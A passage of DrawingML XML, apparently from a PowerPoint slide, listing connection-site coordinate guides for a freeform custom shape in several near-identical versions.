              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 574459 w 1436062"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 573772 w 1436062"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 565420 w 1436062"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 546073 w 1436062"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 547702 w 1436062"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 535402 w 1436062"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 535127 w 1436062"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 539426 w 1436062"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 549799 w 1436062"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 560695 w 1436062"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 568041 w 1436062"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 567337 w 1436062"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 570780 w 1436062"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 592210 w 1436062"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 574736 w 1436062"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 550144 w 1436062"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 535619 w 1436062"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 510793 w 1436062"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 468073 w 1436062"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 402325 w 1436062"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 373142 w 1436062"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 377212 w 1436062"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 345043 w 1436062"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 334930 w 1436062"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 319147 w 1436062"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 316605 w 1436062"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 317598 w 1436062"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 290582 w 1436062"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 267139 w 1436062"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 220938 w 1436062"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 192375 w 1436062"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 173170 w 1436062"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 178992 w 1436062"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 173384 w 1436062"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 179257 w 1436062"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 160845 w 1436062"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 149581 w 1436062"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 151037 w 1436062"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 145902 w 1436062"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 106040 w 1436062"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 102950 w 1436062"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 96606 w 1436062"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 93902 w 1436062"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 0 w 1436062"/>
              <a:gd name="connsiteY72" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 27098 w 1436062"/>
              <a:gd name="connsiteY73" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 9680 w 1436062"/>
              <a:gd name="connsiteY74" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 109280 w 1436062"/>
              <a:gd name="connsiteY75" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 126963 w 1453745"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 190439 w 1453745"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 227032 w 1453745"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 238532 w 1453745"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 255939 w 1453745"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 267517 w 1453745"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 340360 w 1453745"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 356047 w 1453745"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 374887 w 1453745"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 362661 w 1453745"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 355319 w 1453745"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 354117 w 1453745"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 361702 w 1453745"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 391660 w 1453745"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 421458 w 1453745"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 435470 w 1453745"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 459901 w 1453745"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 496784 w 1453745"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 535165 w 1453745"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 541324 w 1453745"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 549606 w 1453745"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 553216 w 1453745"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 567082 w 1453745"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 569813 w 1453745"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 568071 w 1453745"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 574980 w 1453745"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 586239 w 1453745"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 592142 w 1453745"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 591455 w 1453745"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 583103 w 1453745"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 563756 w 1453745"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 565385 w 1453745"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 553085 w 1453745"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 552810 w 1453745"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 557109 w 1453745"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 567482 w 1453745"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 578378 w 1453745"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 585724 w 1453745"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 585020 w 1453745"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 588463 w 1453745"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 609893 w 1453745"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 592419 w 1453745"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 567827 w 1453745"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 553302 w 1453745"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 528476 w 1453745"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 485756 w 1453745"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 420008 w 1453745"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 390825 w 1453745"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 394895 w 1453745"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 362726 w 1453745"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 352613 w 1453745"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 336830 w 1453745"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 334288 w 1453745"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 335281 w 1453745"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308265 w 1453745"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 284822 w 1453745"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 238621 w 1453745"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 210058 w 1453745"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 190853 w 1453745"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196675 w 1453745"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 191067 w 1453745"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196940 w 1453745"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 178528 w 1453745"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 167264 w 1453745"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 168720 w 1453745"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 163585 w 1453745"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 123723 w 1453745"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 120633 w 1453745"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 114289 w 1453745"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 111585 w 1453745"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 17683 w 1453745"/>
              <a:gd name="connsiteY72" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 936 w 1453745"/>
              <a:gd name="connsiteY73" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 27363 w 1453745"/>
              <a:gd name="connsiteY74" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 126963 w 1453745"/>
              <a:gd name="connsiteY75" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 190439 w 1453745"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 227032 w 1453745"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 238532 w 1453745"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 255939 w 1453745"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 267517 w 1453745"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 340360 w 1453745"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 356047 w 1453745"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 374887 w 1453745"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 362661 w 1453745"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 355319 w 1453745"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 354117 w 1453745"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 361702 w 1453745"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 391660 w 1453745"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 421458 w 1453745"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 435470 w 1453745"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 459901 w 1453745"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 496784 w 1453745"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 535165 w 1453745"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 541324 w 1453745"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 549606 w 1453745"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 553216 w 1453745"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 567082 w 1453745"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 569813 w 1453745"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 568071 w 1453745"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 574980 w 1453745"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 586239 w 1453745"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 592142 w 1453745"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 591455 w 1453745"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 583103 w 1453745"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 563756 w 1453745"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 565385 w 1453745"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 553085 w 1453745"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 552810 w 1453745"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 557109 w 1453745"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 567482 w 1453745"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 578378 w 1453745"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 585724 w 1453745"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 585020 w 1453745"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 588463 w 1453745"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 609893 w 1453745"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 592419 w 1453745"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 567827 w 1453745"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 553302 w 1453745"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 528476 w 1453745"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 485756 w 1453745"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 420008 w 1453745"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 390825 w 1453745"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 394895 w 1453745"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 362726 w 1453745"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 352613 w 1453745"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 336830 w 1453745"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 334288 w 1453745"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 335281 w 1453745"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 308265 w 1453745"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 284822 w 1453745"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 238621 w 1453745"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 210058 w 1453745"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 190853 w 1453745"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 196675 w 1453745"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 191067 w 1453745"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196940 w 1453745"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 178528 w 1453745"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 167264 w 1453745"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 168720 w 1453745"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 163585 w 1453745"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 123723 w 1453745"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 120633 w 1453745"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 114289 w 1453745"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 111585 w 1453745"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 17683 w 1453745"/>
              <a:gd name="connsiteY72" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 936 w 1453745"/>
              <a:gd name="connsiteY73" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 27363 w 1453745"/>
              <a:gd name="connsiteY74" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY75" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 66253 w 1453745"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1453745 w 1453745"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 190439 w 1453745"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 227032 w 1453745"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 238532 w 1453745"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 255939 w 1453745"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 267517 w 1453745"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 340360 w 1453745"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 356047 w 1453745"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 374887 w 1453745"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 362661 w 1453745"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
